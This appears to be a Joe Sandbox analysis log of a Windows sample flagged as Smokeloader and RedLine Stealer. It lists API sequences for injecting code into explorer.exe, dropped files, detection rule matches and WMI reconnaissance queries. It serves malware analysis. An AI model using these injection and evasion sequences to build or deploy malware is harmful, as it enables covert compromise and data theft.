Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004014F5 NtAllocateVirtualMemory,	8_2_004014F5
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004014F8 NtAllocateVirtualMemory,	8_2_004014F8
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004014FB NtAllocateVirtualMemory,	8_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00804B92 RtlMoveMemory,NtUnmapViewOfSection,	11_2_00804B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_008033C3 NtQueryInformationFile,	11_2_008033C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0080349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	11_2_0080349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0080342B NtQueryObject,NtQueryObject,RtlMoveMemory,	11_2_0080342B
Source: C:\Windows\explorer.exe	Code function: 14_2_00C838B0 NtUnmapViewOfSection,	14_2_00C838B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_034A1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	16_2_034A1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_034A1A80 NtCreateSection,NtMapViewOfSection,	16_2_034A1A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_034A1819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	16_2_034A1819
Source: C:\Windows\explorer.exe	Code function: 17_2_00F6355C NtUnmapViewOfSection,	17_2_00F6355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00551016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	19_2_00551016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_005518BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	19_2_005518BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00551B26 NtCreateSection,NtMapViewOfSection,	19_2_00551B26
Source: C:\Windows\explorer.exe	Code function: 21_2_00FC370C NtUnmapViewOfSection,	21_2_00FC370C

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AF9AC8	9_2_00007FF763AF9AC8
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AFB43C	9_2_00007FF763AFB43C
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AFDC20	9_2_00007FF763AFDC20
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AF3220	9_2_00007FF763AF3220
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AF213C	9_2_00007FF763AF213C
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AFA534	9_2_00007FF763AFA534
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AFA78C	9_2_00007FF763AFA78C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00802198	11_2_00802198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0080C2F9	11_2_0080C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0081B35C	11_2_0081B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00854438	11_2_00854438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0081B97E	11_2_0081B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00806E6A	11_2_00806E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00825F08	11_2_00825F08
Source: C:\Windows\explorer.exe	Code function: 14_2_00C81E20	14_2_00C81E20
Source: C:\Windows\explorer.exe	Code function: 17_2_00F62860	17_2_00F62860
Source: C:\Windows\explorer.exe	Code function: 17_2_00F62054	17_2_00F62054
Source: C:\Windows\explorer.exe	Code function: 21_2_00FC20F4	21_2_00FC20F4
Source: C:\Windows\explorer.exe	Code function: 21_2_00FC2A04	21_2_00FC2A04

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\451E.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00808801 appears 38 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00807F70 appears 31 times

Source: v173TV3V11.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: v173TV3V11.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C35.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vejhhuh.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bsjhhuh.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@81/14@6/4

Source: C:\Users\user\Desktop\v173TV3V11.exe

Code function: 0_2_009117D6 CreateToolhelp32Snapshot,Module32First,

0_2_009117D6

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Code function: 9_2_00007FF763AFFC84 CoInitializeEx,CoCreateInstance,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,CoUninitialize,

9_2_00007FF763AFFC84

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\bsjhhuh

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\C35.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: v173TV3V11.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="988"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="364"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="696"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="592"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1044"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1084"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1176"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1200"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1252"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1296"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1316"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1476"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1488"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1572"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1724"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1824"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1840"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1940"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1948"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1956"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2036"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1932"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2064"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2216"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2268"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2388"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2396"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2508"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2608"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2616"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2632"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2748"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2900"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2012"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3304"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3536"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3768"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3816"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4032"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2544"::GetOwner
